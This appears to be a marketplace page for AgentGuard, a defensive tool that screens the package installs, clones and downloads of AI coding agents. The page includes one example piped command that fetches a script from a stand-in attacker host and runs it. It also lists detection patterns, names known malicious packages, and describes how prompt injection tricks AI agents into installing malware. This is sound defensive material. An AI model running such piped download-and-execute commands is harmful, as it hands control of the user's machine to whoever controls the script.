Labsco
momenbasel logo

AgentGuard

โ˜… 6

from momenbasel

AI Agent Supply Chain Security - Intercepts and validates every package installation, git clone, and script download triggered by AI coding agents before it executes.

๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅโœ“ VerifiedFreeQuick setup
<p align="center"> <img src="assets/banner.svg" alt="AgentGuard - AI Agent Supply Chain Security" width="100%"> </p> <p align="center"> <a href="https://pypi.org/project/agentguard/"><img src="https://img.shields.io/pypi/v/agentguard?color=00d4ff&style=flat-square" alt="PyPI"></a> <a href="https://github.com/momenbasel/AgentGuard/actions"><img src="https://img.shields.io/github/actions/workflow/status/momenbasel/AgentGuard/ci.yml?style=flat-square" alt="CI"></a> <a href="https://github.com/momenbasel/AgentGuard/blob/main/LICENSE"><img src="https://img.shields.io/github/license/momenbasel/AgentGuard?style=flat-square" alt="License"></a> <a href="https://momenbasel.github.io/AgentGuard/"><img src="https://img.shields.io/badge/docs-GitHub%20Pages-00d4ff?style=flat-square" alt="Docs"></a> </p>

AgentGuard

AI Agent Supply Chain Security - Intercepts and validates every package installation, git clone, and script download triggered by AI coding agents before it executes.

When Claude Code, Codex, Copilot, or any AI coding assistant tries to install a package - AgentGuard checks it first.

Copy & paste โ€” that's it
$ agentguard scan "npm install lodasx"
[HIGH] typosquat [lodasx]: 'lodasx' looks like typosquat of 'lodash' (distance=1, type=substitution)

Would BLOCK this command (HIGH)

The Problem

AI coding agents install packages, clone repos, and run scripts on your machine. They can be tricked by:

  • Typosquatting - lodahs instead of lodash, reqeusts instead of requests
  • Malicious packages - compromised or backdoored packages (event-stream, ua-parser-js, colors)
  • Dependency confusion - internal package names shadowed by public registries
  • Piped execution - curl https://evil.com/install.sh | sh runs before you can review it
  • Scope confusion - @angullar/core (typo) vs @angular/core
  • Prompt injection - an AI told to "install this helpful package" that's actually malware

AgentGuard sits between the AI and your system, catching these before they execute.

What It Checks

CheckWhat it catchesSpeed
BlocklistKnown malicious packages (event-stream, flatmap-stream, crossenv, ctx, ...)Instant
TyposquattingEdit distance + homoglyph detection against top npm/PyPI packagesInstant
Scope confusion@angullar/core vs @angular/coreInstant
Dangerous patternscurl|sh, sudo npm install, custom registries, base64 decode pipesInstant
Registry metadataPackage age < 7 days, no repo link, no maintainers~1s (network)
Repository verificationGitHub repo exists, stars, forks, age, archived status~1s (network)
VirusTotalPackage tarball/URL flagged by AV engines~3s (network)
Live feed (OSV.dev)Real-time malicious package advisories (MAL-, GHSA-)~1s (network, cached 1hr)

Severity Levels

SeverityActionExamples
CRITICALBlockKnown malware, VT detections, curl|sh
HIGHBlockTyposquat (high confidence), non-existent package, sudo install
MEDIUMWarnNew package (< 7 days), global install, custom registry
LOWAllowInformational findings
INFOAllowNon-actionable context

Supported Package Managers

  • npm / pnpm / yarn / bun - install, add, npx/pnpx/bunx
  • pip / pip3 / uv - install
  • composer - require (PHP/Laravel)
  • go - get, install
  • cargo - add, install
  • gem - install
  • brew - install
  • git - clone
  • curl / wget - download detection
  • Claude Code skills - skill install verification

VirusTotal Integration

Optional deep scanning via VirusTotal API:

Copy & paste โ€” that's it
# Set your API key
export VT_API_KEY="your-virustotal-api-key"

# Enable in config
agentguard config init
# Edit ~/.agentguard/config.json and set "check_virustotal": true

# Or per-scan
agentguard scan --json npm install suspicious-package

What VT checks:

  • npm package tarballs (by shasum hash lookup)
  • PyPI distribution files (by sha256 hash lookup)
  • URLs in curl/wget/git clone commands
  • Falls back to URL submission if hash not found

Free VT API: 4 requests/minute, 500/day. Sufficient for normal agent usage.

Architecture

Copy & paste โ€” that's it
AI Agent (Claude Code / Codex / etc.)
    |
    v
[PreToolUse Hook] -----> agentguard hook (stdin: JSON)
    |
    v
[Command Parser] ------> Extract packages, URLs, patterns
    |
    +---> [Blocklist Check]     (instant, local)
    +---> [Typosquat Check]     (instant, local)
    +---> [Pattern Check]       (instant, local)
    +---> [Registry Check]      (network, npm/PyPI API)
    +---> [Repo Check]          (network, GitHub API)
    +---> [VirusTotal Check]    (network, VT API, optional)
    |
    v
[Verdict] --> ALLOW (exit 0) | BLOCK (exit 2) + stderr findings

Extending

Add packages to blocklist

Edit agentguard/data/blocklist.json or use:

Copy & paste โ€” that's it
agentguard config block malicious-package-name

Add popular packages (reduces false positives)

Add to agentguard/data/popular_npm.txt or popular_pypi.txt.

Custom patterns

Add regex patterns to agentguard/checks/patterns.py SUSPICIOUS_PATTERNS list.

Live Security Feed

AgentGuard queries OSV.dev (Google's Open Source Vulnerabilities database) in real-time for every package install. This catches:

  • MAL-* advisories - confirmed malicious packages reported by the OSSF Malicious Packages project
  • GHSA-* advisories - GitHub Security Advisories for compromised packages
  • Critical CVEs - packages with CVSS 9.0+ vulnerabilities

Results are cached for 1 hour to avoid rate limiting. Update local blocklist from feeds:

Copy & paste โ€” that's it
agentguard update

Development

Copy & paste โ€” that's it
git clone https://github.com/momenbasel/AgentGuard.git
cd AgentGuard
pip install -e ".[dev]"
pytest -v
ruff check .

Why This Exists

AI coding agents are increasingly autonomous. They read instructions, write code, and install dependencies - sometimes from prompts that were injected by attackers. A single typosquatted package in an AI-generated npm install can compromise your machine.

This is the seatbelt for vibe coding.

Professional services

AgentGuard is built and maintained by GreyCore Labs, a US-incorporated offensive security firm. Want the same eye on your own product?

License

MIT